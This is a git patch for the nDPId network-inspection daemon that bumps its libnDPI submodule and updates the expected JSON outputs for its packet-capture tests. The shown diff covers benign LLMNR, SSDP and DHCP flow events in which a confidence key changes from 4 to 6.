From a606586a32e1bc065a182ae1973d2565f472ec8d Mon Sep 17 00:00:00 2001 From: Toni Uhlig Date: Thu, 14 Jul 2022 03:48:06 +0200 Subject: bump libnDPI to 7c19de49047a5731f3107ff17854e9afe839cc61 
Signed-off-by: Toni Uhlig --- libnDPI | 2 +- test/results/1kxun.pcap.out | 746 +++++---- test/results/443-chrome.pcap.out | 6 +- test/results/443-curl.pcap.out | 14 +- test/results/443-firefox.pcap.out | 14 +- test/results/443-git.pcap.out | 14 +- test/results/443-opvn.pcap.out | 10 +- test/results/443-safari.pcap.out | 14 +- test/results/4in4tunnel.pcap.out | 6 +- test/results/4in6tunnel.pcap.out | 10 +- test/results/6in4tunnel.pcap.out | 6 +- test/results/6in6tunnel.pcap.out | 6 +- test/results/BGP_Cisco_hdlc_slarp.pcap.out | 10 +- test/results/BGP_redist.pcap.out | 10 +- test/results/EAQ.pcap.out | 130 +- test/results/FAX-Call-t38-CA-TDM-SIP-FB-1.pcap.out | 26 +- test/results/IEC104.pcap.out | 14 +- test/results/KakaoTalk_chat.pcap.out | 196 +-- test/results/KakaoTalk_talk.pcap.out | 56 +- test/results/NTPv2.pcap.out | 10 +- test/results/NTPv3.pcap.out | 10 +- test/results/NTPv4.pcap.out | 10 +- test/results/Oscar.pcap.out | 6 +- test/results/WebattackRCE.pcap.out | 1600 ++++++++++---------- test/results/WebattackSQLinj.pcap.out | 42 +- test/results/WebattackXSS.pcap.out | 94 +- test/results/afp.pcap.out | 10 +- test/results/agora-sd-rtn.pcap.out | 112 +- test/results/ah.pcapng.out | 14 +- test/results/aimini-http.pcap.out | 22 +- test/results/ajp.pcap.out | 14 +- test/results/alexa-app.pcapng.out | 876 +++++------ test/results/among_us.pcap.out | 10 +- test/results/amqp.pcap.out | 18 +- test/results/android.pcap.out | 325 ++-- test/results/anyconnect-vpn.pcap.out | 307 ++-- test/results/anydesk-2.pcap.out | 30 +- test/results/anydesk.pcap.out | 16 +- test/results/avast_securedns.pcapng.out | 162 +- test/results/bad-dns-traffic.pcap.out | 34 +- test/results/badpackets.pcap.out | 6 +- test/results/bitcoin.pcap.out | 30 +- test/results/bittorrent.pcap.out | 102 +- test/results/bittorrent_utp.pcap.out | 15 +- test/results/bjnp.pcap.out | 46 +- test/results/bot.pcap.out | 10 +- test/results/bt_search.pcap.out | 8 +- test/results/cachefly.pcapng.out | 26 + 
test/results/capwap.pcap.out | 24 +- test/results/cassandra.pcap.out | 14 +- test/results/check_mk_new.pcap.out | 10 +- test/results/chrome.pcap.out | 42 +- test/results/citrix.pcap.out | 10 +- test/results/cloudflare-warp.pcap.out | 67 + test/results/coap_mqtt.pcap.out | 70 +- test/results/collectd.pcap.out | 38 +- test/results/corba.pcap.out | 18 +- test/results/cpha.pcap.out | 10 +- test/results/dazn.pcapng.out | 24 +- test/results/dcerpc.pcap.out | 22 +- test/results/dhcp-fuzz.pcapng.out | 6 +- test/results/diameter.pcap.out | 10 +- test/results/discord.pcap.out | 14 +- test/results/dlt_ppp.pcap.out | 6 +- test/results/dnp3.pcap.out | 38 +- test/results/dns-invalid-chars.pcap.out | 12 +- test/results/dns-tunnel-iodine.pcap.out | 12 +- test/results/dns_ambiguous_names.pcap.out | 66 +- test/results/dns_doh.pcap.out | 12 +- test/results/dns_dot.pcap.out | 12 +- test/results/dns_exfiltration.pcap.out | 12 +- test/results/dns_fragmented.pcap.out | 130 +- test/results/dns_invert_query.pcapng.out | 8 +- test/results/dns_long_domainname.pcap.out | 12 +- .../dnscrypt-v1-and-resolver-pings.pcap.out | 998 ++++++------ test/results/dnscrypt-v2-doh.pcap.out | 214 +-- test/results/dnscrypt-v2.pcap.out | 18 +- .../dnscrypt_skype_false_positive.pcapng.out | 12 +- test/results/doq.pcapng.out | 14 +- test/results/doq_adguard.pcapng.out | 10 +- test/results/dos_win98_smb_netbeui.pcap.out | 22 +- test/results/drda_db2.pcap.out | 10 +- test/results/dropbox.pcap.out | 82 +- test/results/dtls.pcap.out | 8 +- test/results/dtls2.pcap.out | 14 +- test/results/dtls_certificate.pcapng.out | 10 +- test/results/dtls_certificate_fragments.pcap.out | 12 +- test/results/dtls_mid_sessions.pcapng.out | 40 + test/results/dtls_old_version.pcapng.out | 25 + .../dtls_session_id_and_coockie_both.pcap.out | 12 +- test/results/emotet.pcap.out | 47 +- test/results/encrypted_sni.pcap.out | 12 +- test/results/esp.pcapng.out | 14 +- test/results/ethereum.pcap.out | 290 ++-- test/results/ethernetIP.pcap.out 
| 22 +- test/results/exe_download.pcap.out | 12 +- test/results/exe_download_as_png.pcap.out | 12 +- test/results/facebook.pcap.out | 20 +- test/results/firefox.pcap.out | 42 +- test/results/fix.pcap.out | 54 +- test/results/fix2.pcap.out | 14 +- test/results/forticlient.pcap.out | 46 +- test/results/ftp-start-tls.pcap.out | 10 +- test/results/ftp.pcap.out | 14 +- test/results/ftp_failed.pcap.out | 10 +- test/results/fuzz-2006-06-26-2594.pcap.out | 776 +++++----- test/results/fuzz-2006-09-29-28586.pcap.out | 44 +- test/results/fuzz-2020-02-16-11740.pcap.out | 258 ++-- test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out | 6 +- test/results/fuzz-2021-10-13.pcap.out | 6 +- test/results/genshin-impact.pcap.out | 30 +- test/results/git.pcap.out | 10 +- test/results/gnutella.pcap.out | 866 +++++------ test/results/google_ssl.pcap.out | 6 +- test/results/googledns_android10.pcap.out | 48 +- test/results/gquic.pcap.out | 10 +- test/results/gre_no_options.pcapng.out | 10 +- test/results/gtp_c.pcap.out | 10 +- test/results/gtp_false_positive.pcapng.out | 6 +- test/results/gtp_prime.pcapng.out | 6 +- test/results/h323-overflow.pcap.out | 6 +- test/results/h323.pcap.out | 14 +- test/results/hangout.pcap.out | 10 +- test/results/hpvirtgrp.pcap.out | 42 +- test/results/hsrp0.pcap.out | 22 +- test/results/hsrp2.pcap.out | 14 +- test/results/hsrp2_ipv6.pcapng.out | 14 +- .../http-crash-content-disposition.pcap.out | 10 +- test/results/http-lines-split.pcap.out | 10 +- test/results/http-manipulated.pcap.out | 14 +- test/results/http_auth.pcap.out | 10 +- test/results/http_connect.pcap.out | 22 +- test/results/http_ipv6.pcap.out | 58 +- test/results/i3d.pcap.out | 44 + test/results/iax.pcap.out | 10 +- test/results/icmp-tunnel.pcap.out | 26 +- test/results/iec60780-5-104.pcap.out | 30 +- test/results/imap-starttls.pcap.out | 10 +- test/results/imap.pcap.out | 10 +- test/results/imaps.pcap.out | 14 +- test/results/imo.pcap.out | 14 +- test/results/instagram.pcap.out | 159 +- 
test/results/ip_fragmented_garbage.pcap.out | 6 +- test/results/iphone.pcap.out | 282 ++-- test/results/ipp.pcap.out | 18 +- test/results/ipsec_isakmp_esp.pcap.out | 174 +-- test/results/ipv6_in_gtp.pcap.out | 6 +- test/results/irc.pcap.out | 10 +- test/results/ja3_lots_of_cipher_suites.pcap.out | 6 +- .../ja3_lots_of_cipher_suites_2_anon.pcap.out | 10 +- test/results/jabber.pcap.out | 110 +- test/results/kerberos-error.pcap.out | 23 + test/results/kerberos-login.pcap.out | 60 +- test/results/kerberos.pcap.out | 54 +- test/results/kerberos_fuzz.pcapng.out | 8 +- test/results/kontiki.pcap.out | 30 +- test/results/lisp_registration.pcap.out | 22 +- test/results/log4j-webapp-exploit.pcap.out | 30 +- test/results/long_tls_certificate.pcap.out | 14 +- test/results/malformed_dns.pcap.out | 12 +- test/results/malformed_icmp.pcap.out | 10 +- test/results/malware.pcap.out | 26 +- test/results/memcached.cap.out | 10 +- test/results/mgcp.pcapng.out | 10 +- test/results/modbus.pcap.out | 10 +- test/results/monero.pcap.out | 14 +- test/results/mongo_false_positive.pcapng.out | 24 + test/results/mongodb.pcap.out | 26 +- test/results/mpeg-dash.pcap.out | 22 +- test/results/mpeg.pcap.out | 12 +- test/results/mpegts.pcap.out | 10 +- test/results/mqtt.pcap.out | 14 +- test/results/mssql_tds.pcap.out | 50 +- test/results/mysql-8.pcap.out | 10 +- test/results/nats.pcap.out | 14 +- ...ndpi_match_string_subprotocol__error.pcapng.out | 10 +- test/results/nest_log_sink.pcap.out | 78 +- test/results/netbios.pcap.out | 62 +- test/results/netbios_wildcard_dns_query.pcap.out | 8 +- test/results/netflix.pcap.out | 350 ++--- test/results/netflow-fritz.pcap.out | 10 +- test/results/netflowv9.pcap.out | 10 +- test/results/nfsv2.pcap.out | 34 +- test/results/nfsv3.pcap.out | 38 +- test/results/nintendo.pcap.out | 86 +- test/results/nntp.pcap.out | 10 +- test/results/no_sni.pcap.out | 50 +- test/results/ocs.pcap.out | 60 +- test/results/ocsp.pcapng.out | 46 +- test/results/ookla.pcap.out | 14 +- 
test/results/openvpn.pcap.out | 18 +- test/results/oracle12.pcapng.out | 6 +- test/results/os_detected.pcapng.out | 10 +- test/results/ospfv2_add_new_prefix.pcap.out | 10 +- test/results/pgm.pcap.out | 10 +- test/results/pgsql.pcap.out | 14 +- test/results/pim.pcap.out | 10 +- test/results/pinterest.pcap.out | 154 +- test/results/pluralsight.pcap.out | 50 +- test/results/pop3.pcap.out | 10 +- test/results/pops.pcapng.out | 10 +- test/results/pps.pcap.out | 280 ++-- test/results/pptp.pcap.out | 10 +- test/results/psiphon3.pcap.out | 26 + test/results/punycode-idn.pcap.out | 20 +- test/results/quic-23.pcap.out | 10 +- test/results/quic-24.pcap.out | 10 +- test/results/quic-27.pcap.out | 10 +- test/results/quic-28.pcap.out | 10 +- test/results/quic-29.pcap.out | 10 +- test/results/quic-33.pcapng.out | 10 +- test/results/quic-34.pcap.out | 10 +- test/results/quic-fuzz-overflow.pcapng.out | 10 +- test/results/quic-mvfst-22.pcap.out | 10 +- .../quic-mvfst-22_decryption_error.pcap.out | 10 +- test/results/quic-mvfst-27.pcapng.out | 10 +- test/results/quic-mvfst-exp.pcap.out | 10 +- test/results/quic-v2-01.pcapng.out | 10 +- test/results/quic.pcap.out | 42 +- test/results/quic046.pcap.out | 10 +- test/results/quic_0RTT.pcap.out | 10 +- test/results/quic_crypto_aes_auth_size.pcap.out | 14 +- .../quic_frags_ch_in_multiple_packets.pcapng.out | 12 +- ...h_out_of_order_same_packet_craziness.pcapng.out | 458 +++--- test/results/quic_interop_V.pcapng.out | 314 ++-- test/results/quic_q39.pcap.out | 10 +- test/results/quic_q43.pcap.out | 10 +- test/results/quic_q46.pcap.out | 10 +- test/results/quic_q46_b.pcap.out | 10 +- test/results/quic_q50.pcap.out | 10 +- test/results/quic_t50.pcap.out | 10 +- test/results/quic_t51.pcap.out | 10 +- test/results/quickplay.pcap.out | 77 +- test/results/radius_false_positive.pcapng.out | 6 +- test/results/raknet.pcap.out | 54 +- test/results/rdp.pcap.out | 10 +- test/results/reasm_crash_anon.pcapng.out | 6 +- 
test/results/reasm_segv_anon.pcapng.out | 10 +- test/results/reddit.pcap.out | 410 ++--- test/results/riotgames.pcap.out | 73 + test/results/rsh-syslog-false-positive.pcap.out | 10 +- test/results/rsh.pcap.out | 14 +- test/results/rsync.pcap.out | 10 +- test/results/rtmp.pcap.out | 10 +- test/results/rtsp.pcap.out | 34 +- test/results/rtsp_setup_http.pcapng.out | 10 +- test/results/rx.pcap.out | 26 +- test/results/s7comm.pcap.out | 10 +- test/results/safari.pcap.out | 52 +- test/results/salesforce.pcap.out | 14 +- test/results/sccp_hw_conf_register.pcapng.out | 10 +- test/results/sctp.cap.out | 14 +- test/results/selfsigned.pcap.out | 12 +- test/results/sflow.pcap.out | 10 +- test/results/signal.pcap.out | 128 +- test/results/simple-dnscrypt.pcap.out | 38 +- test/results/sip.pcap.out | 36 +- test/results/sip_hello.pcapng.out | 26 + test/results/sites.pcapng.out | 276 ++-- test/results/skinny.pcap.out | 70 + test/results/skype-conference-call.pcap.out | 10 +- test/results/skype.pcap.out | 814 +++++----- test/results/skype_no_unknown.pcap.out | 811 +++++----- test/results/skype_udp.pcap.out | 14 +- test/results/smb_deletefile.pcap.out | 10 +- test/results/smb_frags.pcap.out | 24 + test/results/smbv1.pcap.out | 10 +- test/results/smpp_in_general.pcap.out | 10 +- test/results/smtp-starttls.pcap.out | 17 +- test/results/smtp.pcap.out | 10 +- test/results/smtps.pcapng.out | 10 +- test/results/snapchat.pcap.out | 24 +- test/results/snapchat_call.pcapng.out | 15 +- test/results/snmp.pcap.out | 80 +- test/results/soap.pcap.out | 18 +- test/results/socks-http-example.pcap.out | 14 +- test/results/softether-http.pcap.out | 8 +- test/results/someip-tp.pcap.out | 10 +- test/results/someip-udp-method-call.pcapng.out | 14 +- test/results/someip_sd_sample.pcap.out | 6 +- test/results/sql_injection.pcap.out | 10 +- test/results/ssdp-m-search-ua.pcap.out | 10 +- test/results/ssdp-m-search.pcap.out | 10 +- test/results/ssh.pcap.out | 18 +- test/results/ssl-cert-name-mismatch.pcap.out 
| 14 +- test/results/starcraft_battle.pcap.out | 180 +-- test/results/steam.pcap.out | 226 +-- test/results/steam_datagram_relay_ping.pcapng.out | 10 +- test/results/stun_facebook.pcapng.out | 10 +- test/results/stun_signal.pcapng.out | 96 +- test/results/synscan.pcap.out | 22 +- test/results/syslog.pcap.out | 78 +- .../targusdataspeed_false_positives.pcap.out | 27 + test/results/teams.pcap.out | 433 +++--- test/results/teamspeak3.pcap.out | 10 +- test/results/teamviewer.pcap.out | 14 +- test/results/telegram.pcap.out | 210 +-- test/results/telnet.pcap.out | 16 +- test/results/teredo.pcap.out | 26 +- test/results/tftp.pcap.out | 79 +- test/results/threema.pcap.out | 57 + test/results/tinc.pcap.out | 22 +- test/results/tk.pcap.out | 24 +- test/results/tls-appdata.pcap.out | 14 +- test/results/tls-esni-fuzzed.pcap.out | 12 +- test/results/tls-rdn-extract.pcap.out | 14 +- test/results/tls_alert.pcap.out | 12 +- test/results/tls_certificate_too_long.pcap.out | 184 +-- test/results/tls_cipher_lens.pcap.out | 16 +- test/results/tls_esni_sni_both.pcap.out | 18 +- test/results/tls_false_positives.pcapng.out | 24 + test/results/tls_invalid_reads.pcap.out | 25 +- test/results/tls_long_cert.pcap.out | 14 +- test/results/tls_port_80.pcapng.out | 10 +- test/results/tls_torrent.pcapng.out | 14 +- test/results/tls_verylong_certificate.pcap.out | 14 +- test/results/toca-boca.pcap.out | 74 +- test/results/tor.pcap.out | 62 +- test/results/trickbot.pcap.out | 12 +- test/results/tumblr.pcap.out | 102 +- test/results/tunnelbear.pcap.out | 163 ++ test/results/ubntac2.pcap.out | 38 +- test/results/ultrasurf.pcap.out | 38 + test/results/upnp.pcap.out | 14 +- test/results/viber.pcap.out | 148 +- test/results/vnc.pcap.out | 14 +- test/results/vrrp3.pcapng.out | 14 +- test/results/vxlan.pcap.out | 42 +- test/results/wa_video.pcap.out | 58 +- test/results/wa_voice.pcap.out | 126 +- test/results/waze.pcap.out | 156 +- test/results/webex.pcap.out | 268 ++-- test/results/websocket.pcap.out | 10 
+- test/results/wechat.pcap.out | 448 +++--- test/results/weibo.pcap.out | 109 +- test/results/whatsapp.pcap.out | 350 ++--- test/results/whatsapp_login_call.pcap.out | 172 +-- test/results/whatsapp_login_chat.pcap.out | 42 +- test/results/whatsapp_voice_and_message.pcap.out | 58 +- test/results/whatsappfiles.pcap.out | 20 +- test/results/whois.pcapng.out | 16 +- test/results/windowsupdate_over_http.pcap.out | 24 + test/results/wireguard.pcap.out | 14 +- test/results/wow.pcap.out | 26 +- test/results/xdmcp.pcap.out | 10 +- test/results/xiaomi.pcap.out | 32 +- test/results/xss.pcap.out | 10 +- test/results/youtube_quic.pcap.out | 18 +- test/results/youtubeupload.pcap.out | 22 +- test/results/z3950.pcapng.out | 10 +- test/results/zabbix.pcap.out | 10 +- test/results/zattoo.pcap.out | 16 +- test/results/zcash.pcap.out | 10 +- test/results/zoom.pcap.out | 170 +-- test/results/zoom2.pcap.out | 18 +- 355 files changed, 11812 insertions(+), 10920 deletions(-) create mode 100644 test/results/cachefly.pcapng.out create mode 100644 test/results/cloudflare-warp.pcap.out create mode 100644 test/results/dtls_mid_sessions.pcapng.out create mode 100644 test/results/dtls_old_version.pcapng.out create mode 100644 test/results/i3d.pcap.out create mode 100644 test/results/kerberos-error.pcap.out create mode 100644 test/results/mongo_false_positive.pcapng.out create mode 100644 test/results/psiphon3.pcap.out create mode 100644 test/results/riotgames.pcap.out create mode 100644 test/results/sip_hello.pcapng.out create mode 100644 test/results/skinny.pcap.out create mode 100644 test/results/smb_frags.pcap.out create mode 100644 test/results/targusdataspeed_false_positives.pcap.out create mode 100644 test/results/threema.pcap.out create mode 100644 test/results/tls_false_positives.pcapng.out create mode 100644 test/results/tunnelbear.pcap.out create mode 100644 test/results/ultrasurf.pcap.out create mode 100644 test/results/windowsupdate_over_http.pcap.out 
diff --git a/libnDPI b/libnDPI
index 8f6a006e3..7c19de490 160000
--- a/libnDPI
+++ b/libnDPI
@@ -1 +1 @@
-Subproject commit 8f6a006e36eef0ae386f7e663d3ebecfad6a2dc9
+Subproject commit 7c19de49047a5731f3107ff17854e9afe839cc61
diff --git a/test/results/1kxun.pcap.out b/test/results/1kxun.pcap.out
index f6ae1b111..8ee48b0c6 100644
--- a/test/results/1kxun.pcap.out
+++ b/test/results/1kxun.pcap.out
@@ -2,83 +2,83 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1470104373025} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373025,"flow_last_seen":1470104373025,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104373025,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1470104373025,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104373025,"pkt":"AQBeAAD8SNIkYzEACABFAAA2OooAAAER2FzAqAUs4AAA\/OizFOsAIin75qEAAAABAAAAAAAACGphc29uLVBDAAD\/AAE="} 
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373025,"flow_last_seen":1470104373025,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104373025,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373025,"flow_last_seen":1470104373025,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104373025,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1470104373127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104373127,"pkt":"AQBeAAD8SNIkYzEACABFAAA2OosAAAER2FvAqAUs4AAA\/OizFOsAIin75qEAAAABAAAAAAAACGphc29uLVBDAAD\/AAE="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1470104373232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104373232,"pkt":"AQBef\/\/6GF4PUugBCABFAAChMBcAAAER01nAqAU57\/\/\/+toBB2wAjcGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1470104373232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104373232,"pkt":"AQBef\/\/6SNIkYzEACABFAAChOowAAAERyPHAqAUs7\/\/\/+si9B2wAjdLxTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1470104373741,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104373741,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNKS5AgEGAMCRIFIAAIAAwKgFJMCoBSTAqHcBAAAAAAAmWsJjVQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQEKgioX8MMe8wtdP8AAAAA"} -00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 
